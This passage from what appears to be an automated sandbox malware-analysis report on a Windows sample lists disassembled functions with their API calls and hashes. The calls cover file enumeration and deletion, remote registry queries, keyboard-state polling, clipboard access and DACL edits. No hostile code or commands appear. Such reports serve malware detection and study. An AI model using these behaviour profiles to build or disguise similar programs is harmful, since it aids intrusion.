                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                            • API String ID: 536824911-966354055
                                                                                                                            • Opcode ID: 5c6d8b9ca52f692565eb148413c6a8033c287c352a7914c0c56cbd3cf9acc894
                                                                                                                            • Instruction ID: 05e1f8fb19366ffc61f1cff1a4471cc8961ee0b7512df7af642a47115852cca0
                                                                                                                            • Opcode Fuzzy Hash: 5c6d8b9ca52f692565eb148413c6a8033c287c352a7914c0c56cbd3cf9acc894
                                                                                                                            • Instruction Fuzzy Hash: C0027B75600645AFCB54EF25C841E2AB7E5FF89324F14855CF89AAB3A2CB30ED01DB81
                                                                                                                            Function 00F4F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00F4F113
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F128
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F13F
                                                                                                                              • Part of subcall function 00F44385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F443A0
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F4F16E
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F179
                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F4F195
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F1BC
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F1D3
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F4F1E5
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00F98920), ref: 00F4F203
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4F20D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F21A
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F22C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1824444939-438819550
                                                                                                                            • Opcode ID: 4262762a132e523ef0471a62d24de3fe5fc0638637c32a53b5dce6498227e1e1
                                                                                                                            • Instruction ID: 856124c65964bb35cf4cf8e60c5180dafb756eccc435a2cfa1c0f7e7898f35c5
                                                                                                                            • Opcode Fuzzy Hash: 4262762a132e523ef0471a62d24de3fe5fc0638637c32a53b5dce6498227e1e1
                                                                                                                            • Instruction Fuzzy Hash: 1331E73690121E6ADF109F64EC59AEE7BAC9F85370F140171EC18E21A0DB74DF49FA54
                                                                                                                            Function 00F4A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F4A20F
                                                                                                                            • __swprintf.LIBCMT ref: 00F4A231
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F4A26E
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F4A293
                                                                                                                            • _memset.LIBCMT ref: 00F4A2B2
                                                                                                                            • _wcsncpy.LIBCMT ref: 00F4A2EE
                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F4A323
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4A32E
                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00F4A337
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F4A341
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                            • API String ID: 2733774712-3457252023
                                                                                                                            • Opcode ID: 43c935ff54b36bd18fda3b5ed50841383c370976c578027e50a7acb545a7bce3
                                                                                                                            • Instruction ID: 25cc4bbd24a69643c498b892e086aca131b6a271ba703142714542bf3da835be
                                                                                                                            • Opcode Fuzzy Hash: 43c935ff54b36bd18fda3b5ed50841383c370976c578027e50a7acb545a7bce3
                                                                                                                            • Instruction Fuzzy Hash: 8431D4B1940109ABDB21DFA0DC49FEB37BCEF89750F1041B6F918D2160E7B59784AB25
                                                                                                                            Function 00F37CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F38202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F3821E
                                                                                                                              • Part of subcall function 00F38202: GetLastError.KERNEL32(?,00F37CE2,?,?,?), ref: 00F38228
                                                                                                                              • Part of subcall function 00F38202: GetProcessHeap.KERNEL32(00000008,?,?,00F37CE2,?,?,?), ref: 00F38237
                                                                                                                              • Part of subcall function 00F38202: HeapAlloc.KERNEL32(00000000,?,00F37CE2,?,?,?), ref: 00F3823E
                                                                                                                              • Part of subcall function 00F38202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F38255
                                                                                                                              • Part of subcall function 00F3829F: GetProcessHeap.KERNEL32(00000008,00F37CF8,00000000,00000000,?,00F37CF8,?), ref: 00F382AB
                                                                                                                              • Part of subcall function 00F3829F: HeapAlloc.KERNEL32(00000000,?,00F37CF8,?), ref: 00F382B2
                                                                                                                              • Part of subcall function 00F3829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F37CF8,?), ref: 00F382C3
                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F37D13
                                                                                                                            • _memset.LIBCMT ref: 00F37D28
                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F37D47
                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F37D58
                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00F37D95
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F37DB1
                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00F37DCE
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F37DDD
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00F37DE4
                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F37E05
                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00F37E0C
                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F37E3D
                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F37E63
                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F37E77
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3996160137-0
                                                                                                                            • Opcode ID: f46b006dcada1a30ae321d9e71fb6fe7bc0693c99fcf5c03ff2ed6f941458f46
                                                                                                                            • Instruction ID: 54c995faf51e5aaa6fa246c01892dac9adc2dd133ee1b1c6d07cb82786ab160b
                                                                                                                            • Opcode Fuzzy Hash: f46b006dcada1a30ae321d9e71fb6fe7bc0693c99fcf5c03ff2ed6f941458f46
                                                                                                                            • Instruction Fuzzy Hash: C4614CB1904209BFDF109FA4DC44AAEBB79FF08720F048169F815A6291DB759A05EB60
                                                                                                                            Function 00EF66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_
                                                                                                                            • API String ID: 0-4228276721
                                                                                                                            • Opcode ID: 93bf6c7959112157b400f191a6b582b542dea56c43574204361fde3f52145c3b
                                                                                                                            • Instruction ID: 45bf8bae51b7527fc3e574b08b52c1b107ed7f3b6c2c9eb20518448cd9f5e01c
                                                                                                                            • Opcode Fuzzy Hash: 93bf6c7959112157b400f191a6b582b542dea56c43574204361fde3f52145c3b
                                                                                                                            • Instruction Fuzzy Hash: 52726F71E002199BDB24CF58C8817FEB7B5FF44720F14816AE949FB291EB709941DB90
                                                                                                                            Function 00F4001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00F40097
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00F40102
                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00F40122
                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00F40139
                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00F40168
                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00F40179
                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00F401A5
                                                                                                                            • GetKeyState.USER32(00000011), ref: 00F401B3
                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00F401DC
                                                                                                                            • GetKeyState.USER32(00000012), ref: 00F401EA
                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00F40213
                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00F40221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 541375521-0
                                                                                                                            • Opcode ID: 3b9acaa7edaed5bb37e70b0e6f59675607849c99f1564ef848c53f5d6d72b197
                                                                                                                            • Instruction ID: 113367c4953e52dff78f13f356299dba52dc9088ac6d2d4db620e9d45b2e1e69
                                                                                                                            • Opcode Fuzzy Hash: 3b9acaa7edaed5bb37e70b0e6f59675607849c99f1564ef848c53f5d6d72b197
                                                                                                                            • Instruction Fuzzy Hash: 0251CC20D0478819FB35DBA488547AABFB49F41390F08459EDEC25B5C3DEB49B8CEB61
                                                                                                                            Function 00F603DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F604AC
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F6054B
                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F605E3
                                                                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F60822
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F6082F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1240663315-0
                                                                                                                            • Opcode ID: 0e666560090d8530360e727319a54fa2ca1fa58b3da194614db492458e6ddce0
                                                                                                                            • Instruction ID: 838bcaf8e709699976a93495572837d29403885c32c5adf508e66701b970c1a9
                                                                                                                            • Opcode Fuzzy Hash: 0e666560090d8530360e727319a54fa2ca1fa58b3da194614db492458e6ddce0
                                                                                                                            • Instruction Fuzzy Hash: 49E15D71604204AFCB14DF25C891E2BBBE4EF89314F14856DF85ADB2A2DB31ED05DB91
                                                                                                                            Function 00F583BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE9837: __itow.LIBCMT ref: 00EE9862
                                                                                                                              • Part of subcall function 00EE9837: __swprintf.LIBCMT ref: 00EE98AC
                                                                                                                            • CoInitialize.OLE32 ref: 00F58403
                                                                                                                            • CoUninitialize.OLE32 ref: 00F5840E
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00F72BEC,?), ref: 00F5846E
                                                                                                                            • IIDFromString.OLE32(?,?), ref: 00F584E1
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F5857B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F585DC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                            • API String ID: 834269672-1287834457
                                                                                                                            • Opcode ID: 5ae5308bd05297f5f980838387490de364d3ffbb1514d647f4e374dc50699c8f
                                                                                                                            • Instruction ID: 9d3894873221ee6fbf195412535d337fdcc2c2e6c3faaa643ebc7f3dc2506d55
                                                                                                                            • Opcode Fuzzy Hash: 5ae5308bd05297f5f980838387490de364d3ffbb1514d647f4e374dc50699c8f
                                                                                                                            • Instruction Fuzzy Hash: DB61F4716083119FC710DF14C848F6EB7E4AF457A5F040419FE82AB2A1DB70ED4AEB92
                                                                                                                            Function 00F54164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1737998785-0
                                                                                                                            • Opcode ID: 60da160b1b148e7f788e6e55f0bac493ca40b4447b109d692cdebbcfbbca2389
                                                                                                                            • Instruction ID: 5544a5660a1a763acc251305ce37c65e9d5b4ff560429674d5d44ba3091f819b
                                                                                                                            • Opcode Fuzzy Hash: 60da160b1b148e7f788e6e55f0bac493ca40b4447b109d692cdebbcfbbca2389
                                                                                                                            • Instruction Fuzzy Hash: 5021D3756006189FDB01AF60EC09B6D7BE8FF05725F108029FA56DB2B1CBB1AC44EB55
                                                                                                                            Function 00F437EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
                                                                                                                              • Part of subcall function 00F44A31: GetFileAttributesW.KERNEL32(?,00F4370B), ref: 00F44A32
                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F438A3
                                                                                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00F4394B
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F4395E
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00F4397B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F4399D
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00F439B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                            • String ID: \*.*
                                                                                                                            • API String ID: 4002782344-1173974218
                                                                                                                            • Opcode ID: 31ee4193f3ca502fcfc5e87fab8964766255ac715c602c5ebae4b22ea04ee227
                                                                                                                            • Instruction ID: 2485212aec3cf75bf8d3e4a7a59011e6924446c186e4237955e4ff0570f15a61
                                                                                                                            • Opcode Fuzzy Hash: 31ee4193f3ca502fcfc5e87fab8964766255ac715c602c5ebae4b22ea04ee227
                                                                                                                            • Instruction Fuzzy Hash: 1051B131C0418DAACF01EBA1DD929EDBBB9AF14314F600069E852B7192EF716F0DDB61
                                                                                                                            Function 00F4F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00F4F440
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00F4F470
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F484
                                                                                                                            • _wcscmp.LIBCMT ref: 00F4F49F
                                                                                                                            • FindNextFileW.KERNEL32(?,?), ref: 00F4F53D
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00F4F553
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 713712311-438819550
                                                                                                                            • Opcode ID: a4b69a22057134a0cfec593fbdf07286d8622fc121458f9a02b941a50a0f76e7
                                                                                                                            • Instruction ID: 13a02dbebee38f55d6a667bceb4c63fba3b8784e0156560db7141f1c4676180f
                                                                                                                            • Opcode Fuzzy Hash: a4b69a22057134a0cfec593fbdf07286d8622fc121458f9a02b941a50a0f76e7
                                                                                                                            • Instruction Fuzzy Hash: 7B415C71D0025EABDF14DF64DC45AEEBBB8FF05320F144466E859A21A1EB309E89EB50
                                                                                                                            Function 00EF3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __itow__swprintf
                                                                                                                            • String ID: 3c$_
                                                                                                                            • API String ID: 674341424-4099079164
                                                                                                                            • Opcode ID: e74f4a2e69da9990464ae4f5db5656ec1e7cca37f65dcb89c677c9e82c148a51
                                                                                                                            • Instruction ID: 58fc99230d59c81cbe2825e1dffc56dc178d4957375c2627c7d807d739013a35
                                                                                                                            • Opcode Fuzzy Hash: e74f4a2e69da9990464ae4f5db5656ec1e7cca37f65dcb89c677c9e82c148a51
                                                                                                                            • Instruction Fuzzy Hash: 8122BC716083549FC724DF24D881BAEB7E4AF84714F10592DFA9AA7291DB31EE04CB92
                                                                                                                            Function 00EF5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
